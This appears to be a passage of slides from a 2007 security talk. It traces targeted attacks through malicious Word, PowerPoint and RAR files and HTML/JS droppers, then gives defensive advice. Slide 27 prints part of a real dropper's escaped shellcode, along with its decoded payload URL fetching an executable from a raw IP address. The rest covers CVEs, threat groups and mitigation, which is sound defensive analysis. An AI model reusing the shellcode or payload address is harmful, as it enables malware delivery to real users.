  • 27. April 2007: HTML/JS dropper • Contains shellcode var ToWhare = 0x0D0D0D0D; var KernelIsWhat = unescape(quot;%u8b55%u81ec%ue0ec%u0002%u5300%u5756%u6460%u158b%u0030%u0000 %udce9%u0003%u8f00%ub485%ufffd%u8bff%u0c42%u708b%uad1 …hexadecimal… 065%u696f%u746e%u7265%u4300%u6572%u7461%u5065%u6f72%u6563%u7373%u0041% u7845%u7469%u7250%u636f%u7365%u0073%u7255%u6d6c%u6e6f%u642e%u6c6c%u5500 %u4c52%u6f44%u6e77%u6f6c%u6461%u6f54%u6946%u656c%u0041%u0000%u0000quot;); • Final part of shellcode decodes to: http://70.85.25.174:3721/aeexTempcsrse.exedceme./xc start iexplore.exeè e$CGmtmondLineeAWGntoisdiweDtrrcAoGyetFileSi eC reateFileAoCelasdHenWlriteFileaRFeldeSetFilePointereCtrPaoeerscAsExitPrs oseUrlmon.dllLUoRnDowdloaiTeFAl • Protox.O backdoor application 27
  • 28. April 2007: HTML/JS dropper • Virus detection of dropper non-existent 28
  • 29. 2007: Ongoing Word attacks • Mid-May: Word exploit Installs backdoor, connects to Taiwan • End of May: Word exploit Installs Riler backdoor, connects to telephone company in Montana • July 2nd & 3rd: Word exploit Installs backdoor, connects to Hong Kong & Taiwan 29
  • 30. July 2007: WinRAR • RAR file crashes WinRAR 3.5 • Executes on Traditional Chinese systems • Backdoor with Keylogger • No Anti virus detection “This case is not about infection by some virus or Trojan horse but about crash of one particular program version (or library) on incorrect file.” Anonymous anti virus vendor ☺ 30
  • 31. 2007: The attacks continue • Mid August: Malicious Powerpoint Installs backdoor, connects to Taiwan • Late August: Malicious RAR archive Installs key logging backdoor • September: Malicious Powerpoint Installs backdoor, connects to Taiwan 31
  • 32. September: the World Series • 5 Word exploits in one week • Each adds slight changes to avoid detection • Exploit CVE-2006-2492 • Connect to CNC Group Hebei Province • Different hostnames, same IP address • One day later: HTML/JS dropper • New backdoor family • Same control server as in April 32
  • 33. October: the Zero-day threat • MS07-060: Word memory corruption flaw • Attack nine hours prior to patch release • Increased complexity: triple payload • Disable anti virus • Disable HIPS • Install trojan and connect to Taiwan • No anti virus coverage (one false positive) 33
  • 34. Zero-day: Rapid Development • Reuse of existing code • Existing HIPS killer • Visual Studio “Hello World” application • Fit for purpose & fast deployment 34
  • 35. Some quick statistics Targeted software 1 2 1 2 HTML dropper Word WinRAR Pow erpoint Excel 15 Covers April through October 2007 35
  • 36. Some quick statistics Attacks per month 9 8 7 6 5 4 3 2 1 0 ne ly ril r er t ay be s Ju Ap gu ob Ju M em Au ct O pt Se Month in 2007 Covers April through October 2007 36
  • 37. Threat agents • Several groups known to use these attacks • NCPH • HUC • Titan Rain incident • Attribution generally difficult • Trojans, backdoors and rootkits are exchanged • Control servers not shared, often unique • Motive and techniques become discriminators 37
  • 38. Defence against the dark arts 38
  • 39. Defence against the dark arts • Anti malware • Blocking is more important than scanning • Diversify desktop and gateway • AV solutions have different properties • Packed binaries • Retrospective testing • Sandboxing has limited value • Software hardening • MoICE, safe mode • Software asset control • Host IPS technologies 39
  • 40. Defence against the dark arts • Network monitoring • Strong egress filtering and proxying • Clues in the DNS system • Awareness Building & Identity Management • Identify communications which require trust • Make them trustworthy • Security Intelligence • Each attack is unique, group may be common • Participate in ISACs • Response to these attacks requires insight in the threat agent 40
  • 41. Q&A More information Paper at http://www.daemon.be maarten@daemon.be 41